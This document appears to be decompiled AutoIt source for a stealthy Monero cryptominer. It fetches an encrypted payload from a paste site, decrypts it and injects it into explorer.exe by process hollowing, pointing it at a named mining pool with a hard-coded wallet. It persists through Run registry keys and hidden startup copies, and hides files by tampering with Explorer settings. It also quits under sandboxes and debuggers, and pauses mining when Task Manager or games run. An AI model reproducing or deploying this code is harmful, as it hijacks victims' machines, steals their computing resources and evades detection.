#NoTrayIcon
#Region
#AutoIt3Wrapper_Compression=4
#AutoIt3Wrapper_UseUpx=y
#EndRegion
FUNC _3(CONST $0=@ERROR,CONST $1=@EXTENDED)
LOCAL $2=DLLCALL("kernel32.dll","dword","GetLastError")
RETURN SETERROR($0,$1,$2[0])
ENDFUNC
GLOBAL CONST $3="struct;long Left;long Top;long Right;long Bottom;endstruct"
GLOBAL CONST $4="uint cbSize;uint fMask;uint fStyle;dword clrFore;dword clrBack;ptr lpText;uint cch;"&"int iImage;hwnd hwndChild;uint cxMinChild;uint cyMinChild;uint cx;handle hbmBack;uint wID;uint cyChild;uint cyMaxChild;"&"uint cyIntegral;uint cxIdeal;lparam lParam;uint cxHeader"&((@OSVERSION="WIN_XP")""";"&$3&";uint uChevronState")
GLOBAL CONST $5="dword Length;ptr Descriptor;bool InheritHandle"
GLOBAL CONST $6="struct;dword OSVersionInfoSize;dword MajorVersion;dword MinorVersion;dword BuildNumber;dword PlatformId;wchar CSDVersion[128];endstruct"
GLOBAL CONST $7=_1V()
FUNC _1V()
LOCAL $8=DLLSTRUCTCREATE($6)
DLLSTRUCTSETDATA($8,1,DLLSTRUCTGETSIZE($8))
LOCAL $9=DLLCALL("kernel32.dll","bool","GetVersionExW","struct*",$8)
IF @ERROR OR NOT $9[0]THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
RETURN BITOR(BITSHIFT(DLLSTRUCTGETDATA($8,2),-8),DLLSTRUCTGETDATA($8,3))
ENDFUNC
FUNC _53($A,$B=TRUE )
LOCAL $C=INETREAD($A,1)
LOCAL $D=@ERROR,$E=@EXTENDED
IF $B=DEFAULT OR $B THEN $C=BINARYTOSTRING($C)
RETURN SETERROR($D,$E,$C)
ENDFUNC
GLOBAL CONST $F=-268435456
GLOBAL $G[3]
FUNC _5A()
IF _5L()=0 THEN
LOCAL $H=DLLOPEN("Advapi32.dll")
IF $H=-1 THEN RETURN SETERROR(1001,0,FALSE )
_5P($H)
LOCAL $I=24
LOCAL $9=DLLCALL(_5O(),"bool","CryptAcquireContext","handle*",0,"ptr",0,"ptr",0,"dword",$I,"dword",$F)
IF @ERROR OR NOT $9[0]THEN
LOCAL $D=@ERROR+1002,$E=@EXTENDED
IF NOT $9[0]THEN $E=_3()
DLLCLOSE(_5O())
RETURN SETERROR($D,$E,FALSE )
ELSE
_5R($9[1])
ENDIF
ENDIF
_5M()
RETURN TRUE
ENDFUNC
FUNC _5B()
_5N()
IF _5L()=0 THEN
DLLCALL(_5O(),"bool","CryptReleaseContext","handle",_5Q(),"dword",0)
DLLCLOSE(_5O())
ENDIF
ENDFUNC
FUNC _5C($J,$K,$L=32771)
LOCAL $9=0,$M=0,$N=0,$D=0,$E=0,$O=0
_5A()
IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,-1)
DO
$9=DLLCALL(_5O(),"bool","CryptCreateHash","handle",_5Q(),"uint",$L,"ptr",0,"dword",0,"handle*",0)
IF @ERROR OR NOT $9[0]THEN
$D=@ERROR+10
$E=@EXTENDED
IF NOT $9[0]THEN $E=_3()
$O=-1
EXITLOOP
ENDIF
$N=$9[5]
$M=DLLSTRUCTCREATE("byte["&BINARYLEN($J)&"]")
DLLSTRUCTSETDATA($M,1,$J)
$9=DLLCALL(_5O(),"bool","CryptHashData","handle",$N,"struct*",$M,"dword",DLLSTRUCTGETSIZE($M),"dword",1)
IF @ERROR OR NOT $9[0]THEN
$D=@ERROR+20
$E=@EXTENDED
IF NOT $9[0]THEN $E=_3()
$O=-1
EXITLOOP
ENDIF
$9=DLLCALL(_5O(),"bool","CryptDeriveKey","handle",_5Q(),"uint",$K,"handle",$N,"dword",1,"handle*",0)
IF @ERROR OR NOT $9[0]THEN
$D=@ERROR+30
$E=@EXTENDED
IF NOT $9[0]THEN $E=_3()
$O=-1
EXITLOOP
ENDIF
$O=$9[5]
UNTIL TRUE
IF $N<>0 THEN DLLCALL(_5O(),"bool","CryptDestroyHash","handle",$N)
RETURN SETERROR($D,$E,$O)
ENDFUNC
FUNC _5D($P)
LOCAL $9=DLLCALL(_5O(),"bool","CryptDestroyKey","handle",$P)
LOCAL $D=@ERROR,$E=@EXTENDED
IF NOT $9[0]THEN $E=_3()
_5B()
IF $D OR NOT $9[0]THEN
RETURN SETERROR($D+10,$E,FALSE )
ELSE
RETURN TRUE
ENDIF
ENDFUNC
FUNC _5F($Q,$R,$K,$S=TRUE )
SWITCH $K
CASE 0
LOCAL $T=_5S($R)
IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,-1)
IF $T=26625 THEN CONTINUECASE
CASE 26625
IF BINARYLEN($Q)=0 THEN RETURN SETERROR(0,0,BINARY(""))
ENDSWITCH
LOCAL $9=0,$M=0,$U=0,$D=0,$E=0,$V=0,$O=0
_5A()
IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,-1)
DO
IF $K<>0 THEN
$R=_5C($R,$K)
IF @ERROR THEN
$D=@ERROR
$E=@EXTENDED
$O=-1
EXITLOOP
ENDIF
ENDIF
$M=DLLSTRUCTCREATE("byte["&BINARYLEN($Q)+1000&"]")
IF BINARYLEN($Q)>0 THEN DLLSTRUCTSETDATA($M,1,$Q)
$9=DLLCALL(_5O(),"bool","CryptDecrypt","handle",$R,"handle",0,"bool",$S,"dword",0,"struct*",$M,"dword*",BINARYLEN($Q))
IF @ERROR OR NOT $9[0]THEN
$D=@ERROR+70
$E=@EXTENDED
IF NOT $9[0]THEN $E=_3()
$O=-1
EXITLOOP
ENDIF
$V=$9[6]
$U=DLLSTRUCTCREATE("byte["&$V+1&"]",DLLSTRUCTGETPTR($M))
$O=BINARYMID(DLLSTRUCTGETDATA($U,1),1,$V)
UNTIL TRUE
IF $K<>0 THEN _5D($R)
_5B()
RETURN SETERROR($D,$E,$O)
ENDFUNC
FUNC _5L()
RETURN $G[0]
ENDFUNC
FUNC _5M()
$G[0]+=1
ENDFUNC
FUNC _5N()
IF $G[0]>0 THEN $G[0]-=1
ENDFUNC
FUNC _5O()
RETURN $G[1]
ENDFUNC
FUNC _5P($H)
$G[1]=$H
ENDFUNC
FUNC _5Q()
RETURN $G[2]
ENDFUNC
FUNC _5R($W)
$G[2]=$W
ENDFUNC
FUNC _5S($R)
LOCAL $X=DLLSTRUCTCREATE("uint")
LOCAL $9=DLLCALL(_5O(),"bool","CryptGetKeyParam","handle",$R,"dword",7,"struct*",$X,"dword*",DLLSTRUCTGETSIZE($X),"dword",0)
LOCAL $D=@ERROR,$E=@EXTENDED
IF NOT $9[0]THEN $E=_3()
IF $D OR NOT $9[0]THEN
RETURN SETERROR($D+80,$E,1)
ELSE
RETURN DLLSTRUCTGETDATA($X,1)
ENDIF
ENDFUNC
FUNC _5U()
LOCAL $Y=DLLSTRUCTCREATE("uint;dword")
DLLSTRUCTSETDATA($Y,1,DLLSTRUCTGETSIZE($Y))
LOCAL $2=DLLCALL("user32.dll","bool","GetLastInputInfo","struct*",$Y)
IF @ERROR OR $2[0]=0 THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
LOCAL $0Z=DLLCALL("kernel32.dll","dword","GetTickCount")
IF @ERROR OR NOT $2[0]THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
LOCAL $10=$0Z[0]-DLLSTRUCTGETDATA($Y,2)
IF $10<0 THEN RETURN SETEXTENDED(1,$0Z[0])
RETURN $10
ENDFUNC
FUNC _66($11,$12=0)
LOCAL CONST $13=183
LOCAL CONST $14=1
LOCAL $15=0
IF BITAND($12,2)THEN
LOCAL $16=DLLSTRUCTCREATE("byte;byte;word;ptr[4]")
LOCAL $9=DLLCALL("advapi32.dll","bool","InitializeSecurityDescriptor","struct*",$16,"dword",$14)
IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
IF $9[0]THEN
$9=DLLCALL("advapi32.dll","bool","SetSecurityDescriptorDacl","struct*",$16,"bool",1,"ptr",0,"bool",0)
IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
IF $9[0]THEN
$15=DLLSTRUCTCREATE($5)
DLLSTRUCTSETDATA($15,1,DLLSTRUCTGETSIZE($15))
DLLSTRUCTSETDATA($15,2,DLLSTRUCTGETPTR($16))
DLLSTRUCTSETDATA($15,3,0)
ENDIF
ENDIF
ENDIF
LOCAL $17=DLLCALL("kernel32.dll","handle","CreateMutexW","struct*",$15,"bool",1,"wstr",$11)
IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
LOCAL $18=DLLCALL("kernel32.dll","dword","GetLastError")
IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
IF $18[0]=$13 THEN
IF BITAND($12,1)THEN
DLLCALL("kernel32.dll","bool","CloseHandle","handle",$17[0])
IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
RETURN SETERROR($18[0],$18[0],0)
ELSE
EXIT -1
ENDIF
ENDIF
RETURN $17[0]
ENDFUNC
_66("ixhost",1)
$19="UpdateScheduler"
GLOBAL $1A
IF @OSARCH="X86" THEN
$1A=@WINDOWSDIR&"\explorer.exe"
ELSE
$1A=@SYSTEMDIR&"\explorer.exe"
ENDIF
$1B="C:\Windows\System32\svchost.exe"
$1C="pool.supportxmr.com:3333"
$1D="42yzCwXHqAr2cbZ6kWU8SZJCq5H3quBAkgDd6ZZGKvvRYaPxKJ8J6GMVhGjo8pmgy74NRTvVst2ZGAk35ERgAS88NFHQQAV"
$1E="-o "&$1C&" -u "&$1D&" -p x -k -t 1 --nicehash"
$1F="-o "&$1C&" -u "&$1D&" -p x -k --max-cpu-usage=100 --nicehash"
IF _66("ixkiller",1)=0 THEN
IF PROCESSEXISTS(@SCRIPTNAME)THEN
PROCESSCLOSE(@SCRIPTNAME)
ENDIF
ENDIF
$1G=_53("https://paste.ee/r/LG8VC/0")
$1H=_5F($1G,"ix32",26128)
$1I=""
_6E(1000)
WHILE 1
GUIGETMSG()
_6F()
_6D($19)
_6C()
WEND
FUNC _6C()
IF PROCESSEXISTS("SbieCtrl.exe")OR WINGETTEXT("Sanboxie Control")OR WINGETTEXT("PEiD")OR WINGETTEXT("ollydbg")OR WINGETTEXT("exetoaut")OR WINGETTEXT("myAutToExe")OR WINGETTEXT("Program Manager")THEN
EXIT
ENDIF
ENDFUNC
FUNC _6D($19)
IF ISADMIN()=1 THEN
IF FILEEXISTS(@WINDOWSDIR&"\"&@SCRIPTNAME)=FALSE THEN
FILECOPY(@SCRIPTFULLPATH,@WINDOWSDIR&"\"&@SCRIPTNAME)
ENDIF
IF REGREAD("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",$19)="" THEN
REGWRITE("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",$19,"REG_SZ",@WINDOWSDIR&"\"&@SCRIPTNAME)
ENDIF
ELSE
IF FILEEXISTS(@STARTUPDIR&"\"&@SCRIPTNAME)=FALSE THEN
FILECOPY(@SCRIPTFULLPATH,@STARTUPDIR&"\"&@SCRIPTNAME)
FILECOPY(@SCRIPTFULLPATH,@DOCUMENTSCOMMONDIR&"\"&@SCRIPTNAME)
ENDIF
IF REGREAD("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",$19)="" THEN
REGWRITE("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",$19,"REG_SZ",@STARTUPDIR&"\"&@SCRIPTNAME)
REGWRITE("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",$19,"REG_SZ",@DOCUMENTSCOMMONDIR&"\"&@SCRIPTNAME)
FILESETATTRIB(@STARTUPDIR&"\"&@SCRIPTNAME,"+SH")
FILESETATTRIB(@DOCUMENTSCOMMONDIR&"\"&@SCRIPTNAME,"+SH")
REGWRITE("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoFolderOptions","REG_DWORD",1)
REGWRITE("HKCU64\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","ShowSuperHidden","REG_DWORD",0)
ENDIF
ENDIF
ENDFUNC
FUNC _6E($1J)
LOCAL $1K=DLLCALL("kernel32.dll","dword","GetTickCount")
SLEEP($1J)
LOCAL $1L=DLLCALL("kernel32.dll","dword","GetTickCount")
IF $1L[0]-$1K[0]=$1J THEN
RETURN FALSE
ELSE
RETURN TRUE
ENDIF
ENDFUNC
FUNC _6F()
$1M=_5U()
IF PROCESSEXISTS("Taskmgr.exe")OR PROCESSEXISTS("procexp.exe")OR PROCESSEXISTS("procexp64.exe")OR PROCESSEXISTS("procmon.exe")OR PROCESSEXISTS("FortniteClient-Win64-Shipping.exe")OR PROCESSEXISTS("bf1.exe")OR PROCESSEXISTS("bf4.exe")OR PROCESSEXISTS("bf4_x86.exe")OR PROCESSEXISTS("NFS16.exe")OR PROCESSEXISTS("NFS16_trial.exe")OR PROCESSEXISTS("Overwatch.exe")OR PROCESSEXISTS("csgo.exe")OR PROCESSEXISTS("argo.exe")OR PROCESSEXISTS("dota2.exe")OR PROCESSEXISTS("rust.exe")OR PROCESSEXISTS("argo_x64.exe")OR PROCESSEXISTS("arma3.exe")OR PROCESSEXISTS("arma3_x64.exe")OR PROCESSEXISTS("Creativerse.exe")OR PROCESSEXISTS("hl2.exe")OR PROCESSEXISTS("GTA5.exe")OR PROCESSEXISTS("insurgency.exe")OR PROCESSEXISTS("insurgency_64.exe")OR PROCESSEXISTS("paladins.exe")OR PROCESSEXISTS("TslGame.exe")OR PROCESSEXISTS("Unturned.exe")OR WINEXISTS("FIFA")THEN
WINKILL($1A)
SLEEP(10)
ELSE
IF $1M>50000 THEN
IF NOT PROCESSEXISTS("madHcCtrl.exe")AND NOT PROCESSEXISTS("Sling.exe")THEN
IF $1I="low" THEN
WINKILL($1A)
_6G($1H,$1F,$1A)
SLEEP(5000)
$1I="high"
ELSEIF $1I="" THEN
_6G($1H,$1F,$1A)
SLEEP(5000)
$1I="high"
ENDIF
ELSEIF $1I="high" THEN
_6G($1H,$1E,$1A)
SLEEP(5000)
$1I="low"
ELSEIF $1I="" THEN
_6G($1H,$1E,$1A)
SLEEP(5000)
$1I="low"
ENDIF
ELSEIF $1I="high" THEN
WINKILL($1A)
_6G($1H,$1E,$1A)
SLEEP(5000)
$1I="low"
ELSEIF $1I="" THEN
_6G($1H,$1E,$1A)
SLEEP(5000)
$1I="low"
ELSEIF NOT WINEXISTS($1A)THEN
_6G($1H,$1E,$1A)
SLEEP(3000)
ENDIF
ENDIF
ENDFUNC
FUNC _6G($1N,$1O=0,$1P=0)
LOCAL $1Q=@AUTOITX64
LOCAL $1R=BINARY($1N)
LOCAL $1S=DLLSTRUCTCREATE("byte["&BINARYLEN($1R)&"]")
DLLSTRUCTSETDATA($1S,1,$1R)
LOCAL $1T=DLLSTRUCTGETPTR($1S)
LOCAL $1U=DLLSTRUCTCREATE("dword  cbSize;"&"ptr Reserved;"&"ptr Desktop;"&"ptr Title;"&"dword X;"&"dword Y;"&"dword XSize;"&"dword YSize;"&"dword XCountChars;"&"dword YCountChars;"&"dword FillAttribute;"&"dword Flags;"&"word ShowWindow;"&"word Reserved2;"&"ptr Reserved2;"&"ptr hStdInput;"&"ptr hStdOutput;"&"ptr hStdError")
DLLSTRUCTSETDATA($1U,"Flags",1)
DLLSTRUCTSETDATA($1U,"ShowWindow",@SW_HIDE)
LOCAL $1V=DLLSTRUCTCREATE("ptr Process;"&"ptr Thread;"&"dword ProcessId;"&"dword ThreadId")
IF $1O THEN $1O=$1P&" "&$1O
LOCAL $1W=DLLCALL("kernel32.dll","bool","CreateProcessW","wstr",$1P,"wstr",$1O,"ptr",0,"ptr",0,"int",0,"dword",4,"ptr",0,"ptr",0,"ptr",DLLSTRUCTGETPTR($1U),"ptr",DLLSTRUCTGETPTR($1V))
IF @ERROR OR NOT $1W[0]THEN RETURN SETERROR(1,0,0)
LOCAL $1X=DLLSTRUCTGETDATA($1V,"Process")
LOCAL $1Y=DLLSTRUCTGETDATA($1V,"Thread")
IF $1Q AND _6M($1X)THEN
DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
RETURN SETERROR(2,0,0)
ENDIF
LOCAL $1Z,$20
IF $1Q THEN
IF @OSARCH="X64" THEN
$1Z=2
$20=DLLSTRUCTCREATE("align 16; uint64 P1Home; uint64 P2Home; uint64 P3Home; uint64 P4Home; uint64 P5Home; uint64 P6Home;"&"dword ContextFlags; dword MxCsr;"&"word SegCS; word SegDs; word SegEs; word SegFs; word SegGs; word SegSs; dword EFlags;"&"uint64 Dr0; uint64 Dr1; uint64 Dr2; uint64 Dr3; uint64 Dr6; uint64 Dr7;"&"uint64 Rax; uint64 Rcx; uint64 Rdx; uint64 Rbx; uint64 Rsp; uint64 Rbp; uint64 Rsi; uint64 Rdi; uint64 R8; uint64 R9; uint64 R10; uint64 R11; uint64 R12; uint64 R13; uint64 R14; uint64 R15;"&"uint64 Rip;"&"uint64 Header[4]; uint64 Legacy[16]; uint64 Xmm0[2]; uint64 Xmm1[2]; uint64 Xmm2[2]; uint64 Xmm3[2]; uint64 Xmm4[2]; uint64 Xmm5[2]; uint64 Xmm6[2]; uint64 Xmm7[2]; uint64 Xmm8[2]; uint64 Xmm9[2]; uint64 Xmm10[2]; uint64 Xmm11[2]; uint64 Xmm12[2]; uint64 Xmm13[2]; uint64 Xmm14[2]; uint64 Xmm15[2];"&"uint64 VectorRegister[52]; uint64 VectorControl;"&"uint64 DebugControl; uint64 LastBranchToRip; uint64 LastBranchFromRip; uint64 LastExceptionToRip; uint64 LastExceptionFromRip")
ELSE
$1Z=3
DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
RETURN SETERROR(102,0,0)
ENDIF
ELSE
$1Z=1
$20=DLLSTRUCTCREATE("dword ContextFlags;"&"dword Dr0; dword Dr1; dword Dr2; dword Dr3; dword Dr6; dword Dr7;"&"dword ControlWord; dword StatusWord; dword TagWord; dword ErrorOffset; dword ErrorSelector; dword DataOffset; dword DataSelector; byte RegisterArea[80]; dword Cr0NpxState;"&"dword SegGs; dword SegFs; dword SegEs; dword SegDs;"&"dword Edi; dword Esi; dword Ebx; dword Edx; dword Ecx; dword Eax;"&"dword Ebp; dword Eip; dword SegCs; dword EFlags; dword Esp; dword SegSs;"&"byte ExtendedRegisters[512]")
ENDIF
LOCAL $21
SWITCH $1Z
CASE 1
$21=65543
CASE 2
$21=1048583
CASE 3
$21=524327
ENDSWITCH
DLLSTRUCTSETDATA($20,"ContextFlags",$21)
$1W=DLLCALL("kernel32.dll","bool","GetThreadContext","handle",$1Y,"ptr",DLLSTRUCTGETPTR($20))
IF @ERROR OR NOT $1W[0]THEN
DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
RETURN SETERROR(3,0,0)
ENDIF
LOCAL $22
SWITCH $1Z
CASE 1
$22=DLLSTRUCTGETDATA($20,"Ebx")
CASE 2
$22=DLLSTRUCTGETDATA($20,"Rdx")
CASE 3
ENDSWITCH
LOCAL $23=DLLSTRUCTCREATE("char Magic[2];"&"word BytesOnLastPage;"&"word Pages;"&"word Relocations;"&"word SizeofHeader;"&"word MinimumExtra;"&"word MaximumExtra;"&"word SS;"&"word SP;"&"word Checksum;"&"word IP;"&"word CS;"&"word Relocation;"&"word Overlay;"&"char Reserved[8];"&"word OEMIdentifier;"&"word OEMInformation;"&"char Reserved2[20];"&"dword AddressOfNewExeHeader",$1T)
LOCAL $24=$1T
$1T+=DLLSTRUCTGETDATA($23,"AddressOfNewExeHeader")
LOCAL $25=DLLSTRUCTGETDATA($23,"Magic")
IF NOT ($25=="MZ")THEN
DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
RETURN SETERROR(4,0,0)
ENDIF
LOCAL $26=DLLSTRUCTCREATE("dword Signature",$1T)
$1T+=4
IF DLLSTRUCTGETDATA($26,"Signature")<>17744 THEN
DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
RETURN SETERROR(5,0,0)
ENDIF
LOCAL $27=DLLSTRUCTCREATE("word Machine;"&"word NumberOfSections;"&"dword TimeDateStamp;"&"dword PointerToSymbolTable;"&"dword NumberOfSymbols;"&"word SizeOfOptionalHeader;"&"word Characteristics",$1T)
LOCAL $28=DLLSTRUCTGETDATA($27,"NumberOfSections")
$1T+=20
LOCAL $29=DLLSTRUCTCREATE("word Magic;",$1T)
LOCAL $2A=DLLSTRUCTGETDATA($29,1)
LOCAL $2B
IF $2A=267 THEN
IF $1Q THEN
DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
RETURN SETERROR(6,0,0)
ENDIF
$2B=DLLSTRUCTCREATE("word Magic;"&"byte MajorLinkerVersion;"&"byte MinorLinkerVersion;"&"dword SizeOfCode;"&"dword SizeOfInitializedData;"&"dword SizeOfUninitializedData;"&"dword AddressOfEntryPoint;"&"dword BaseOfCode;"&"dword BaseOfData;"&"dword ImageBase;"&"dword SectionAlignment;"&"dword FileAlignment;"&"word MajorOperatingSystemVersion;"&"word MinorOperatingSystemVersion;"&"word MajorImageVersion;"&"word MinorImageVersion;"&"word MajorSubsystemVersion;"&"word MinorSubsystemVersion;"&"dword Win32VersionValue;"&"dword SizeOfImage;"&"dword SizeOfHeaders;"&"dword CheckSum;"&"word Subsystem;"&"word DllCharacteristics;"&"dword SizeOfStackReserve;"&"dword SizeOfStackCommit;"&"dword SizeOfHeapReserve;"&"dword SizeOfHeapCommit;"&"dword LoaderFlags;"&"dword NumberOfRvaAndSizes",$1T)
$1T+=96
ELSEIF $2A=523 THEN
IF NOT $1Q THEN
DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
RETURN SETERROR(6,0,0)
ENDIF
$2B=DLLSTRUCTCREATE("word Magic;"&"byte MajorLinkerVersion;"&"byte MinorLinkerVersion;"&"dword SizeOfCode;"&"dword SizeOfInitializedData;"&"dword SizeOfUninitializedData;"&"dword AddressOfEntryPoint;"&"dword BaseOfCode;"&"uint64 ImageBase;"&"dword SectionAlignment;"&"dword FileAlignment;"&"word MajorOperatingSystemVersion;"&"word MinorOperatingSystemVersion;"&"word MajorImageVersion;"&"word MinorImageVersion;"&"word MajorSubsystemVersion;"&"word MinorSubsystemVersion;"&"dword Win32VersionValue;"&"dword SizeOfImage;"&"dword SizeOfHeaders;"&"dword CheckSum;"&"word Subsystem;"&"word DllCharacteristics;"&"uint64 SizeOfStackReserve;"&"uint64 SizeOfStackCommit;"&"uint64 SizeOfHeapReserve;"&"uint64 SizeOfHeapCommit;"&"dword LoaderFlags;"&"dword NumberOfRvaAndSizes",$1T)
$1T+=112
ELSE
DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
RETURN SETERROR(6,0,0)
ENDIF
LOCAL $2C=DLLSTRUCTGETDATA($2B,"AddressOfEntryPoint")
LOCAL $2D=DLLSTRUCTGETDATA($2B,"SizeOfHeaders")
LOCAL $2E=DLLSTRUCTGETDATA($2B,"ImageBase")
LOCAL $2F=DLLSTRUCTGETDATA($2B,"SizeOfImage")
$1T+=8
$1T+=8
$1T+=24
LOCAL $2G=DLLSTRUCTCREATE("dword VirtualAddress; dword Size",$1T)
LOCAL $2H=DLLSTRUCTGETDATA($2G,"VirtualAddress")
LOCAL $2I=DLLSTRUCTGETDATA($2G,"Size")
LOCAL $2J
IF $2H AND $2I THEN $2J=TRUE
IF NOT $2J THEN CONSOLEWRITE("!!!NOT RELOCATABLE MODULE. I WILL TRY BUT THIS MAY NOT WORK!!!"&@CRLF)
$1T+=88
LOCAL $2K
LOCAL $2L
IF $2J THEN
$2L=_6K($1X,$2F)
IF @ERROR THEN
$2L=_6J($1X,$2E,$2F)
IF @ERROR THEN
_6L($1X,$2E)
$2L=_6J($1X,$2E,$2F)
IF @ERROR THEN
DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
RETURN SETERROR(101,1,0)
ENDIF
ENDIF
ENDIF
$2K=TRUE
ELSE
$2L=_6J($1X,$2E,$2F)
IF @ERROR THEN
_6L($1X,$2E)
$2L=_6J($1X,$2E,$2F)
IF @ERROR THEN
DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
RETURN SETERROR(101,0,0)
ENDIF
ENDIF
ENDIF
DLLSTRUCTSETDATA($2B,"ImageBase",$2L)
LOCAL $2M=DLLSTRUCTCREATE("byte["&$2F&"]")
LOCAL $2N=DLLSTRUCTGETPTR($2M)
LOCAL $2O=DLLSTRUCTCREATE("byte["&$2D&"]",$24)
DLLSTRUCTSETDATA($2M,1,DLLSTRUCTGETDATA($2O,1))
LOCAL $2P
LOCAL $2Q,$2R
LOCAL $2S,$2T
LOCAL $2U
FOR $2V=1 TO $28
$2P=DLLSTRUCTCREATE("char Name[8];"&"dword UnionOfVirtualSizeAndPhysicalAddress;"&"dword VirtualAddress;"&"dword SizeOfRawData;"&"dword PointerToRawData;"&"dword PointerToRelocations;"&"dword PointerToLinenumbers;"&"word NumberOfRelocations;"&"word NumberOfLinenumbers;"&"dword Characteristics",$1T)
$2Q=DLLSTRUCTGETDATA($2P,"SizeOfRawData")
$2R=$24+DLLSTRUCTGETDATA($2P,"PointerToRawData")
$2S=DLLSTRUCTGETDATA($2P,"VirtualAddress")
$2T=DLLSTRUCTGETDATA($2P,"UnionOfVirtualSizeAndPhysicalAddress")
IF $2T AND $2T<$2Q THEN $2Q=$2T
IF $2Q THEN
DLLSTRUCTSETDATA(DLLSTRUCTCREATE("byte["&$2Q&"]",$2N+$2S),1,DLLSTRUCTGETDATA(DLLSTRUCTCREATE("byte["&$2Q&"]",$2R),1))
ENDIF
IF $2K THEN
IF $2S<=$2H AND $2S+$2Q>$2H THEN
$2U=DLLSTRUCTCREATE("byte["&$2I&"]",$2R+($2H-$2S))
ENDIF
ENDIF
$1T+=40
NEXT
IF $2K THEN _6I($2N,$2U,$2L,$2E,$2A=523)
$1W=DLLCALL("kernel32.dll","bool",_6H(),"handle",$1X,"ptr",$2L,"ptr",$2N,"dword_ptr",$2F,"dword_ptr*",0)
IF @ERROR OR NOT $1W[0]THEN
DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
RETURN SETERROR(7,0,0)
ENDIF
LOCAL $2W=DLLSTRUCTCREATE("byte InheritedAddressSpace;"&"byte ReadImageFileExecOptions;"&"byte BeingDebugged;"&"byte Spare;"&"ptr Mutant;"&"ptr ImageBaseAddress;"&"ptr LoaderData;"&"ptr ProcessParameters;"&"ptr SubSystemData;"&"ptr ProcessHeap;"&"ptr FastPebLock;"&"ptr FastPebLockRoutine;"&"ptr FastPebUnlockRoutine;"&"dword EnvironmentUpdateCount;"&"ptr KernelCallbackTable;"&"ptr EventLogSection;"&"ptr EventLog;"&"ptr FreeList;"&"dword TlsExpansionCounter;"&"ptr TlsBitmap;"&"dword TlsBitmapBits[2];"&"ptr ReadOnlySharedMemoryBase;"&"ptr ReadOnlySharedMemoryHeap;"&"ptr ReadOnlyStaticServerData;"&"ptr AnsiCodePageData;"&"ptr OemCodePageData;"&"ptr UnicodeCaseTableData;"&"dword NumberOfProcessors;"&"dword NtGlobalFlag;"&"byte Spare2[4];"&"int64 CriticalSectionTimeout;"&"dword HeapSegmentReserve;"&"dword HeapSegmentCommit;"&"dword HeapDeCommitTotalFreeThreshold;"&"dword HeapDeCommitFreeBlockThreshold;"&"dword NumberOfHeaps;"&"dword MaximumNumberOfHeaps;"&"ptr ProcessHeaps;"&"ptr GdiSharedHandleTable;"&"ptr ProcessStarterHelper;"&"ptr GdiDCAttributeList;"&"ptr LoaderLock;"&"dword OSMajorVersion;"&"dword OSMinorVersion;"&"dword OSBuildNumber;"&"dword OSPlatformId;"&"dword ImageSubSystem;"&"dword ImageSubSystemMajorVersion;"&"dword ImageSubSystemMinorVersion;"&"dword GdiHandleBuffer[34];"&"dword PostProcessInitRoutine;"&"dword TlsExpansionBitmap;"&"byte TlsExpansionBitmapBits[128];"&"dword SessionId")
$1W=DLLCALL("kernel32.dll","bool","ReadProcessMemory","ptr",$1X,"ptr",$22,"ptr",DLLSTRUCTGETPTR($2W),"dword_ptr",DLLSTRUCTGETSIZE($2W),"dword_ptr*",0)
IF @ERROR OR NOT $1W[0]THEN
DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
RETURN SETERROR(8,0,0)
ENDIF
DLLSTRUCTSETDATA($2W,"ImageBaseAddress",$2L)
$1W=DLLCALL("kernel32.dll","bool",_6H(),"handle",$1X,"ptr",$22,"ptr",DLLSTRUCTGETPTR($2W),"dword_ptr",DLLSTRUCTGETSIZE($2W),"dword_ptr*",0)
IF @ERROR OR NOT $1W[0]THEN
DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
RETURN SETERROR(9,0,0)
ENDIF
SWITCH $1Z
CASE 1
DLLSTRUCTSETDATA($20,"Eax",$2L+$2C)
CASE 2
DLLSTRUCTSETDATA($20,"Rcx",$2L+$2C)
CASE 3
ENDSWITCH
$1W=DLLCALL("kernel32.dll","bool","SetThreadContext","handle",$1Y,"ptr",DLLSTRUCTGETPTR($20))
IF @ERROR OR NOT $1W[0]THEN
DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
RETURN SETERROR(10,0,0)
ENDIF
$1W=DLLCALL("kernel32.dll","dword","ResumeThread","handle",$1Y)
IF @ERROR OR $1W[0]=-1 THEN
DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
RETURN SETERROR(11,0,0)
ENDIF
DLLCALL("kernel32.dll","bool","CloseHandle","handle",$1X)
DLLCALL("kernel32.dll","bool","CloseHandle","handle",$1Y)
